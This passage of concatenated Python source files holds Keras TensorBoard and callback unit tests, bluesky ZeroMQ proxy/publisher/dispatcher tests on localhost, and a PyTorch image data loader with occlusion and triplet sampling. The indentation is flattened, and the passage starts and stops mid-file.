model = keras.models.Model([inp1, inp2], [output1, output2])
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# we must generate new callbacks for each test, as they aren't stateless
def callbacks_factory(histogram_freq):
return [keras.callbacks.TensorBoard(log_dir=filepath,
histogram_freq=histogram_freq,
write_images=True, write_grads=True,
batch_size=5)]
# fit without validation data
model.fit([x_train] * 2, [y_train] * 2, batch_size=BATCH_SIZE,
callbacks=callbacks_factory(histogram_freq=0), epochs=3)
# fit with validation data and accuracy
model.fit([x_train] * 2, [y_train] * 2, batch_size=BATCH_SIZE,
validation_data=([x_test] * 2, [y_test] * 2),
callbacks=callbacks_factory(histogram_freq=1), epochs=2)
# fit generator without validation data
model.fit_generator(data_generator(True), len(x_train), epochs=2,
callbacks=callbacks_factory(histogram_freq=0))
# fit generator with validation data and accuracy
model.fit_generator(data_generator(True), len(x_train), epochs=2,
validation_data=([x_test] * 2, [y_test] * 2),
callbacks=callbacks_factory(histogram_freq=1))
assert os.path.isdir(filepath)
@test_util.run_deprecated_v1
def test_Tensorboard_histogram_summaries_in_test_function(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
self.steps_seen = []
def add_summary(self, summary, global_step):
summary_obj = summary_pb2.Summary()
# ensure a valid Summary proto is being sent
if isinstance(summary, bytes):
summary_obj.ParseFromString(summary)
else:
assert isinstance(summary, summary_pb2.Summary)
summary_obj = summary
# keep track of steps seen for the merged_summary op,
# which contains the histogram summaries
if len(summary_obj.value) > 1:
self.steps_seen.append(global_step)
def flush(self):
pass
def close(self):
pass
def _init_writer(obj, _):
obj.writer = FileWriterStub(obj.log_dir)
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
with self.cached_session():
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
# non_trainable_weights: moving_variance, moving_mean
model.add(keras.layers.BatchNormalization())
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
keras.callbacks.TensorBoard._init_writer = _init_writer
tsb = keras.callbacks.TensorBoard(
log_dir=tmpdir,
histogram_freq=1,
write_images=True,
write_grads=True,
batch_size=5)
cbks = [tsb]
# fit with validation data
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=3,
verbose=0)
self.assertAllEqual(tsb.writer.steps_seen, [0, 1, 2, 3, 4, 5])
@test_util.run_deprecated_v1
def test_Tensorboard_histogram_summaries_with_generator(self):
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
def generator():
x = np.random.randn(10, 100).astype(np.float32)
y = np.random.randn(10, 10).astype(np.float32)
while True:
yield x, y
with self.cached_session():
model = testing_utils.get_small_sequential_mlp(
num_hidden=10, num_classes=10, input_dim=100)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
tsb = keras.callbacks.TensorBoard(
log_dir=tmpdir,
histogram_freq=1,
write_images=True,
write_grads=True,
batch_size=5)
cbks = [tsb]
# fit with validation generator
model.fit_generator(
generator(),
steps_per_epoch=2,
epochs=2,
validation_data=generator(),
validation_steps=2,
callbacks=cbks,
verbose=0)
with self.assertRaises(ValueError):
# fit with validation generator but no
# validation_steps
model.fit_generator(
generator(),
steps_per_epoch=2,
epochs=2,
validation_data=generator(),
callbacks=cbks,
verbose=0)
self.assertTrue(os.path.exists(tmpdir))
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model
# training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_TensorBoard_with_ReduceLROnPlateau(self):
with self.cached_session():
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='binary_crossentropy', optimizer='sgd', metrics=['accuracy'])
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', factor=0.5, patience=4, verbose=1),
keras.callbacks.TensorBoard(log_dir=temp_dir)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert os.path.exists(temp_dir)
@test_util.run_deprecated_v1
def test_Tensorboard_batch_logging(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
self.batches_logged = []
self.summary_values = []
self.summary_tags = []
def add_summary(self, summary, step):
self.summary_values.append(summary.value[0].simple_value)
self.summary_tags.append(summary.value[0].tag)
self.batches_logged.append(step)
def flush(self):
pass
def close(self):
pass
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='batch')
tb_cbk.writer = FileWriterStub(temp_dir)
for batch in range(5):
tb_cbk.on_batch_end(batch, {'acc': batch})
self.assertEqual(tb_cbk.writer.batches_logged, [0, 1, 2, 3, 4])
self.assertEqual(tb_cbk.writer.summary_values, [0., 1., 2., 3., 4.])
self.assertEqual(tb_cbk.writer.summary_tags, ['batch_acc'] * 5)
@test_util.run_deprecated_v1
def test_Tensorboard_epoch_and_batch_logging(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
def add_summary(self, summary, step):
if 'batch_' in summary.value[0].tag:
self.batch_summary = (step, summary)
elif 'epoch_' in summary.value[0].tag:
self.epoch_summary = (step, summary)
def flush(self):
pass
def close(self):
pass
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='batch')
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_batch_end(0, {'acc': 5.0})
batch_step, batch_summary = tb_cbk.writer.batch_summary
self.assertEqual(batch_step, 0)
self.assertEqual(batch_summary.value[0].simple_value, 5.0)
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='epoch')
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_epoch_end(0, {'acc': 10.0})
epoch_step, epoch_summary = tb_cbk.writer.epoch_summary
self.assertEqual(epoch_step, 0)
self.assertEqual(epoch_summary.value[0].simple_value, 10.0)
@test_util.run_in_graph_and_eager_modes
def test_Tensorboard_eager(self):
temp_dir = tempfile.mkdtemp(dir=self.get_temp_dir())
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='binary_crossentropy',
optimizer=adam.AdamOptimizer(0.01),
metrics=['accuracy'])
cbks = [keras.callbacks.TensorBoard(log_dir=temp_dir)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
self.assertTrue(os.path.exists(temp_dir))
@test_util.run_deprecated_v1
def test_TensorBoard_update_freq(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
self.batch_summaries = []
self.epoch_summaries = []
def add_summary(self, summary, step):
if 'batch_' in summary.value[0].tag:
self.batch_summaries.append((step, summary))
elif 'epoch_' in summary.value[0].tag:
self.epoch_summaries.append((step, summary))
def flush(self):
pass
def close(self):
pass
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
# Epoch mode
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='epoch')
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 1})
self.assertEqual(tb_cbk.writer.batch_summaries, [])
tb_cbk.on_epoch_end(0, {'acc': 10.0, 'size': 1})
self.assertEqual(len(tb_cbk.writer.epoch_summaries), 1)
# Batch mode
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='batch')
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 1})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 1)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 1})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 2)
self.assertFalse(tb_cbk.writer.epoch_summaries)
# Integer mode
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq=20)
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
self.assertFalse(tb_cbk.writer.batch_summaries)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 1)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 1)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 2)
tb_cbk.on_batch_end(0, {'acc': 10.0, 'size': 10})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 2)
self.assertFalse(tb_cbk.writer.epoch_summaries)
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with self.cached_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
if __name__ == '__main__':
test.main()
|
test_zmq.py
|
import multiprocessing
import os
import signal
from subprocess import run
import threading
import time
import numpy as np
import pytest
from bluesky import Msg
from bluesky.callbacks.zmq import Proxy, Publisher, RemoteDispatcher
from bluesky.plans import count
def test_proxy_script():
p = run(['bluesky-0MQ-proxy', '-h'])
assert p.returncode == 0
def test_zmq(RE, hw):
# COMPONENT 1
# Run a 0MQ proxy on a separate process.
def start_proxy():
Proxy(5567, 5568).start()
proxy_proc = multiprocessing.Process(target=start_proxy, daemon=True)
proxy_proc.start()
time.sleep(5) # Give this plenty of time to start up.
# COMPONENT 2
# Run a Publisher and a RunEngine in this main process.
p = Publisher('127.0.0.1:5567') # noqa
RE.subscribe(p)
# COMPONENT 3
# Run a RemoteDispatcher on another separate process. Pass the documents
# it receives over a Queue to this process, so we can count them for our
# test.
def make_and_start_dispatcher(queue):
def put_in_queue(name, doc):
print('putting ', name, 'in queue')
queue.put((name, doc))
d = RemoteDispatcher('127.0.0.1:5568')
d.subscribe(put_in_queue)
print("REMOTE IS READY TO START")
d.loop.call_later(9, d.stop)
d.start()
queue = multiprocessing.Queue()
dispatcher_proc = multiprocessing.Process(target=make_and_start_dispatcher,
daemon=True, args=(queue,))
dispatcher_proc.start()
time.sleep(5) # As above, give this plenty of time to start.
# Generate two documents. The Publisher will send them to the proxy
# device over 5567, and the proxy will send them to the
# RemoteDispatcher over 5568. The RemoteDispatcher will push them into
# the queue, where we can verify that they round-tripped.
local_accumulator = []
def local_cb(name, doc):
local_accumulator.append((name, doc))
# Check that numpy stuff is sanitized by putting some in the start doc.
md = {'stuff': {'nested': np.array([1, 2, 3])},
'scalar_stuff': np.float64(3),
'array_stuff': np.ones((3, 3))}
# RE([Msg('open_run', **md), Msg('close_run')], local_cb)
RE(count([hw.det]), local_cb)
time.sleep(1)
# Get the two documents from the queue (or timeout --- test will fail)
remote_accumulator = []
for i in range(len(local_accumulator)):
remote_accumulator.append(queue.get(timeout=2))
p.close()
proxy_proc.terminate()
dispatcher_proc.terminate()
proxy_proc.join()
dispatcher_proc.join()
assert remote_accumulator == local_accumulator
def test_zmq_components():
# The test `test_zmq` runs Proxy and RemoteDispatcher in a separate
# process, which coverage misses.
pid = os.getpid()
def delayed_sigint(delay):
time.sleep(delay)
os.kill(os.getpid(), signal.SIGINT)
proxy = Proxy(5567, 5568)
assert not proxy.closed
threading.Thread(target=delayed_sigint, args=(5,)).start()
try:
proxy.start()
# delayed_sigint stops the proxy
except KeyboardInterrupt:
...
assert proxy.closed
with pytest.raises(RuntimeError):
proxy.start()
proxy = Proxy() # random port
threading.Thread(target=delayed_sigint, args=(5,)).start()
try:
proxy.start()
# delayed_sigint stops the proxy
except KeyboardInterrupt:
...
repr(proxy)
# test that two ways of specifying address are equivalent
d = RemoteDispatcher('localhost:5555')
assert d.address == ('localhost', 5555)
d = RemoteDispatcher(('localhost', 5555))
assert d.address == ('localhost', 5555)
repr(d)
def test_zmq_no_RE(RE):
# COMPONENT 1
# Run a 0MQ proxy on a separate process.
def start_proxy():
Proxy(5567, 5568).start()
proxy_proc = multiprocessing.Process(target=start_proxy, daemon=True)
proxy_proc.start()
time.sleep(5) # Give this plenty of time to start up.
# COMPONENT 2
# Run a Publisher and a RunEngine in this main process.
p = Publisher('127.0.0.1:5567') # noqa
# COMPONENT 3
# Run a RemoteDispatcher on another separate process. Pass the documents
# it receives over a Queue to this process, so we can count them for our
# test.
def make_and_start_dispatcher(queue):
def put_in_queue(name, doc):
print('putting ', name, 'in queue')
queue.put((name, doc))
d = RemoteDispatcher('127.0.0.1:5568')
d.subscribe(put_in_queue)
print("REMOTE IS READY TO START")
d.loop.call_later(9, d.stop)
d.start()
queue = multiprocessing.Queue()
dispatcher_proc = multiprocessing.Process(target=make_and_start_dispatcher,
daemon=True, args=(queue,))
dispatcher_proc.start()
time.sleep(5) # As above, give this plenty of time to start.
# Generate two documents. The Publisher will send them to the proxy
# device over 5567, and the proxy will send them to the
# RemoteDispatcher over 5568. The RemoteDispatcher will push them into
# the queue, where we can verify that they round-tripped.
local_accumulator = []
def local_cb(name, doc):
local_accumulator.append((name, doc))
RE([Msg('open_run'), Msg('close_run')], local_cb)
# This time the Publisher isn't attached to an RE. Send the documents
# manually. (The idea is, these might have come from a Broker instead...)
for name, doc in local_accumulator:
p(name, doc)
time.sleep(1)
# Get the two documents from the queue (or timeout --- test will fail)
remote_accumulator = []
for i in range(2):
remote_accumulator.append(queue.get(timeout=2))
p.close()
proxy_proc.terminate()
dispatcher_proc.terminate()
proxy_proc.join()
dispatcher_proc.join()
assert remote_accumulator == local_accumulator
def test_zmq_no_RE_newserializer(RE):
cloudpickle = pytest.importorskip('cloudpickle')
# COMPONENT 1
# Run a 0MQ proxy on a separate process.
def start_proxy():
Proxy(5567, 5568).start()
proxy_proc = multiprocessing.Process(target=start_proxy, daemon=True)
proxy_proc.start()
time.sleep(5) # Give this plenty of time to start up.
# COMPONENT 2
# Run a Publisher and a RunEngine in this main process.
p = Publisher('127.0.0.1:5567', serializer=cloudpickle.dumps) # noqa
# COMPONENT 3
# Run a RemoteDispatcher on another separate process. Pass the documents
# it receives over a Queue to this process, so we can count them for our
# test.
def make_and_start_dispatcher(queue):
def put_in_queue(name, doc):
print('putting ', name, 'in queue')
queue.put((name, doc))
d = RemoteDispatcher('127.0.0.1:5568', deserializer=cloudpickle.loads)
d.subscribe(put_in_queue)
print("REMOTE IS READY TO START")
d.loop.call_later(9, d.stop)
d.start()
queue = multiprocessing.Queue()
dispatcher_proc = multiprocessing.Process(target=make_and_start_dispatcher,
daemon=True, args=(queue,))
dispatcher_proc.start()
time.sleep(5) # As above, give this plenty of time to start.
# Generate two documents. The Publisher will send them to the proxy
# device over 5567, and the proxy will send them to the
# RemoteDispatcher over 5568. The RemoteDispatcher will push them into
# the queue, where we can verify that they round-tripped.
local_accumulator = []
def local_cb(name, doc):
local_accumulator.append((name, doc))
RE([Msg('open_run'), Msg('close_run')], local_cb)
# This time the Publisher isn't attached to an RE. Send the documents
# manually. (The idea is, these might have come from a Broker instead...)
for name, doc in local_accumulator:
p(name, doc)
time.sleep(1)
# Get the two documents from the queue (or timeout --- test will fail)
remote_accumulator = []
for i in range(2):
remote_accumulator.append(queue.get(timeout=2))
p.close()
proxy_proc.terminate()
dispatcher_proc.terminate()
proxy_proc.join()
dispatcher_proc.join()
assert remote_accumulator == local_accumulator
def test_zmq_prefix(RE, hw):
# COMPONENT 1
# Run a 0MQ proxy on a separate process.
def start_proxy():
Proxy(5567, 5568).start()
proxy_proc = multiprocessing.Process(target=start_proxy, daemon=True)
proxy_proc.start()
time.sleep(5) # Give this plenty of time to start up.
# COMPONENT 2
# Run a Publisher and a RunEngine in this main process.
p = Publisher('127.0.0.1:5567', prefix=b'sb') # noqa
p2 = Publisher('127.0.0.1:5567', prefix=b'not_sb') # noqa
RE.subscribe(p)
RE.subscribe(p2)
# COMPONENT 3
# Run a RemoteDispatcher on another separate process. Pass the documents
# it receives over a Queue to this process, so we can count them for our
# test.
def make_and_start_dispatcher(queue):
def put_in_queue(name, doc):
print('putting ', name, 'in queue')
queue.put((name, doc))
d = RemoteDispatcher('127.0.0.1:5568', prefix=b'sb')
d.subscribe(put_in_queue)
print("REMOTE IS READY TO START")
d.loop.call_later(9, d.stop)
d.start()
queue = multiprocessing.Queue()
dispatcher_proc = multiprocessing.Process(target=make_and_start_dispatcher,
daemon=True, args=(queue,))
dispatcher_proc.start()
time.sleep(5) # As above, give this plenty of time to start.
# Generate two documents. The Publisher will send them to the proxy
# device over 5567, and the proxy will send them to the
# RemoteDispatcher over 5568. The RemoteDispatcher will push them into
# the queue, where we can verify that they round-tripped.
local_accumulator = []
def local_cb(name, doc):
local_accumulator.append((name, doc))
# Check that numpy stuff is sanitized by putting some in the start doc.
md = {'stuff': {'nested': np.array([1, 2, 3])},
'scalar_stuff': np.float64(3),
'array_stuff': np.ones((3, 3))}
# RE([Msg('open_run', **md), Msg('close_run')], local_cb)
RE(count([hw.det]), local_cb)
time.sleep(1)
# Get the two documents from the queue (or timeout --- test will fail)
remote_accumulator = []
for i in range(len(local_accumulator)):
remote_accumulator.append(queue.get(timeout=2))
p.close()
proxy_proc.terminate()
dispatcher_proc.terminate()
proxy_proc.join()
dispatcher_proc.join()
assert remote_accumulator == local_accumulator
|
data_loader.py
|
from __future__ import print_function, division, absolute_import
import glob
import random
import time
# Python 2/3 support
try:
import queue
except ImportError:
import Queue as queue
import cv2
import numpy as np
import torch as th
from joblib import Parallel, delayed
from torch.multiprocessing import Queue, Process
from .preprocess import IMAGE_WIDTH, IMAGE_HEIGHT
from .utils import preprocessInput
def sample_coordinates(coord_1, max_distance, percentage):
"""
Sampling from a coordinate A, a second one B within a maximum distance [max_distance X percentage]
:param coord_1: (int) sample first coordinate
:param max_distance: (int) max value of coordinate in the axis
:param percentage: (float) maximum occlusion as a percentage
:return: (tuple of int)
"""
min_coord_2 = max(0, coord_1 - max_distance * percentage)
max_coord_2 = min(coord_1 + max_distance * percentage, max_distance)
coord_2 = np.random.randint(low=min_coord_2, high=max_coord_2)
return min(coord_1, coord_2), max(coord_1, coord_2)
def preprocessImage(image, convert_to_rgb=True, apply_occlusion=False, occlusion_percentage=0.5):
"""
:param image: (np.ndarray) image (BGR or RGB)
:param convert_to_rgb: (bool) whether the conversion to rgb is needed or not
:param apply_occlusion: (bool) whether to occludes part of the images or not
(used for training denoising autoencoder)
:param occlusion_percentage: (float) max percentage of occlusion (in width and height)
:return: (np.ndarray)
"""
# Resize
im = cv2.resize(image, (IMAGE_WIDTH, IMAGE_HEIGHT), interpolation=cv2.INTER_AREA)
# Convert BGR to RGB
if convert_to_rgb:
im = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)
# Normalize
im = preprocessInput(im.astype(np.float32), mode="image_net")
if apply_occlusion:
h_1 = np.random.randint(IMAGE_HEIGHT)
h_1, h_2 = sample_coordinates(h_1, IMAGE_HEIGHT, percentage=occlusion_percentage)
w_1 = np.random.randint(IMAGE_WIDTH)
w_1, w_2 = sample_coordinates(w_1, IMAGE_WIDTH, percentage=occlusion_percentage)
noisy_img = im
# This mask is set by applying zero values to corresponding pixels.
noisy_img[h_1:h_2, w_1:w_2, :] = 0.
im = noisy_img
return im
class DataLoader(object):
def __init__(self, minibatchlist, images_path, n_workers=1, multi_view=False, use_triplets=False,
infinite_loop=True, max_queue_len=4, is_training=False, apply_occlusion=False,
occlusion_percentage=0.5, absolute_path=False):
"""
A Custom dataloader to work with our datasets, and to prepare data for the different models
(inverse, priors, autoencoder, ...)
:param minibatchlist: ([np.array]) list of observations indices (grouped per minibatch)
:param images_path: (np.array) Array of path to images
:param n_workers: (int) number of preprocessing worker (load and preprocess each image)
:param multi_view: (bool)
:param use_triplets: (bool)
:param infinite_loop: (bool) whether to have an iterator that can be resetted, set to False, it
:param max_queue_len: (int) Max number of minibatches that can be preprocessed at the same time
:param apply_occlusion: is the use of occlusion enabled - when using DAE (bool)
:param occlusion_percentage: max percentage of occlusion when using DAE (float)
:param is_training: (bool)
Set to True, the dataloader will output both `obs` and `next_obs` (a tuple of th.Tensor)
Set to false, it will only output one th.Tensor.
"""
super(DataLoader, self).__init__()
self.n_workers = n_workers
self.infinite_loop = infinite_loop
self.n_minibatches = len(minibatchlist)
self.minibatchlist = minibatchlist
self.images_path = images_path
self.shuffle = is_training
self.queue = Queue(max_queue_len)
self.process = None
self.use_triplets = use_triplets
self.multi_view = multi_view
# apply occlusion for training a DAE
self.apply_occlusion = apply_occlusion
self.occlusion_percentage = occlusion_percentage
self.absolute_path = absolute_path
self.startProcess()
@staticmethod
def createTestMinibatchList(n_samples, batch_size):
"""
Create list of minibatch for plotting
:param n_samples: (int)
:param batch_size: (int)
:return: ([np.array])
"""
minibatchlist = []
for i in range(n_samples // batch_size + 1):
start_idx = i * batch_size
end_idx = min(n_samples, (i + 1) * batch_size)
minibatchlist.append(np.arange(start_idx, end_idx))
return minibatchlist
def startProcess(self):
"""Start preprocessing process"""
self.process = Process(target=self._run)
# Make it a deamon, so it will be deleted at the same time
# of the main process
self.process.daemon = True
self.process.start()
def _run(self):
start = True
with Parallel(n_jobs=self.n_workers, batch_size="auto", backend="threading") as parallel:
while start or self.infinite_loop:
start = False
if self.shuffle:
indices = np.random.permutation(self.n_minibatches).astype(np.int64)
else:
indices = np.arange(len(self.minibatchlist), dtype=np.int64)
for minibatch_idx in indices:
batch_noisy, batch_obs_noisy, batch_next_obs_noisy = None, None, None
if self.shuffle:
images = np.stack((self.images_path[self.minibatchlist[minibatch_idx]],
self.images_path[self.minibatchlist[minibatch_idx] + 1]))
images = images.flatten()
else:
images = self.images_path[self.minibatchlist[minibatch_idx]]
if self.n_workers <= 1:
batch = [self._makeBatchElement(image_path, self.multi_view, self.use_triplets,
absolute_path=self.absolute_path)
for image_path in images]
if self.apply_occlusion:
batch_noisy = [self._makeBatchElement(image_path, self.multi_view, self.use_triplets,
apply_occlusion=self.apply_occlusion,
occlusion_percentage=self.occlusion_percentage,
absolute_path=self.absolute_path)
for image_path in images]
else:
batch = parallel(
delayed(self._makeBatchElement)(image_path, self.multi_view, self.use_triplets,
absolute_path=self.absolute_path)
for image_path in images)
if self.apply_occlusion:
batch_noisy = parallel(
delayed(self._makeBatchElement)(image_path, self.multi_view, self.use_triplets,
apply_occlusion=self.apply_occlusion,
occlusion_percentage=self.occlusion_percentage,
absolute_path=self.absolute_path)
for image_path in images)
batch = th.cat(batch, dim=0)
if self.apply_occlusion:
batch_noisy = th.cat(batch_noisy, dim=0)
if self.shuffle:
batch_obs, batch_next_obs = batch[:len(images) // 2], batch[len(images) // 2:]
if batch_noisy is not None:
batch_obs_noisy, batch_next_obs_noisy = batch_noisy[:len(images) // 2], \
batch_noisy[len(images) // 2:]
self.queue.put((minibatch_idx, batch_obs, batch_next_obs,
batch_obs_noisy, batch_next_obs_noisy))
else:
self.queue.put(batch)
# Free memory
if self.shuffle:
del batch_obs
del batch_next_obs
if batch_noisy is not None:
del batch_obs_noisy
del batch_next_obs_noisy
del batch
del batch_noisy
self.queue.put(None)
@classmethod
def _makeBatchElement(cls, image_path, multi_view=False, use_triplets=False, apply_occlusion=False,
occlusion_percentage=None, absolute_path=False):
"""
:param image_path: (str) path to an image (without the 'data/' prefix)
:param multi_view: (bool)
:param use_triplets: (bool)
:return: (th.Tensor)
"""
# Remove trailing .jpg if present
prepath = '' if absolute_path else 'data/'
image_path = prepath + image_path.split('.jpg')[0]
if multi_view:
images = []
# Load different view of the same timestep
for i in range(2):
im = cv2.imread("{}_{}.jpg".format(image_path, i + 1))
if im is None:
raise ValueError("tried to load {}_{}.jpg, but it was not found".format(image_path, i + 1))
images.append(preprocessImage(im, apply_occlusion=apply_occlusion,
occlusion_percentage=occlusion_percentage))
####################
# loading a negative observation
if use_triplets:
# End of file format for positive & negative observations (camera 1) - length : 6 characters
extra_chars = '_1.jpg'
# getting path for all files of same record episode, e.g path_to_data/record_001/frame[0-9]{6}*
digits_path = glob.glob(image_path[:-6] + '[0-9]*' + extra_chars)
# getting the current & all frames' timesteps
current = int(image_path[-6:])
# For all others extract last 6 digits (timestep) after removing the extra chars
all_frame_steps = [int(k[:-len(extra_chars)][-6:]) for k in digits_path]
# removing current positive timestep from the list
all_frame_steps.remove(current)
# negative timestep by random sampling
length_set_steps = len(all_frame_steps)
negative = all_frame_steps[random.randint(0, length_set_steps - 1)]
negative_path = '{}{:06d}'.format(image_path[:-6], negative)
im3 = cv2.imread(negative_path + "_1.jpg")
if im3 is None:
raise ValueError("tried to load {}_{}.jpg, but it was not found".format(negative_path, 1))
im3 = preprocessImage(im3)
# stacking along channels
images.append(im3)
im = np.dstack(images)
else:
im = cv2.imread("{}.jpg".format(image_path))
if im is None:
raise ValueError("tried to load {}.jpg, but it was not found".format(image_path))
im = preprocessImage(im, apply_occlusion=apply_occlusion, occlusion_percentage=occlusion_percentage)
# Channel first (for pytorch convolutions) + one dim for the batch
# th.tensor creates a copy
im = th.tensor(im.reshape((1,) + im.shape).transpose(0, 3, 2, 1))
return im
def __len__(self):
return self.n_minibatches
def __iter__(self):
return self
def __next__(self):
while True:
try:
val = self.queue.get_nowait()
break
except queue.Empty:
time.sleep(0.001)
continue
if val is None:
raise StopIteration
return val
next = __next__ # Python 2 compatibility
def __del__(self):
if self.process is not None:
self.process.terminate()
class SupervisedDataLoader(DataLoader):
"""
Data loader for supervised learning.
:param x_indices: (np.array) indices of observations
:param y_values: (np.array) targets for each input value
:param images_path: (np.array) Array of path to images
:param batch_size: (int)
:param n_workers: (int) number of workers used for preprocessing
:param no_targets: (bool) Set to true, only inputs are generated
:param shuffle: (bool) Set to True, the dataloader will shuffle the indices
:param infinite_loop: (bool) whether to have an iterator that can be resetted, set to False, it
:param max_queue_len: (int) Max number of minibatches that can be preprocessed at the same time
"""
def __init__(self, x_indices, y_values, images_path, batch_size, n_workers=1, no_targets=False,
shuffle=False, infinite_loop=True, max_queue_len=4, absolute_path=False):
# Create minibatch list
minibatchlist, targets = self.createMinibatchList(x_indices, y_values, batch_size)
# Whether to yield targets together with output
# (not needed when plotting or predicting states)
self.no_targets = no_targets
self.targets = np.array(targets)
self.shuffle = shuffle
self.absolute_path = absolute_path
super(SupervisedDataLoader, self).__init__(minibatchlist, images_path, n_workers=n_workers,
infinite_loop=infinite_loop, max_queue_len=max_queue_len,
absolute_path=self.absolute_path)
def _run(self):
start = True
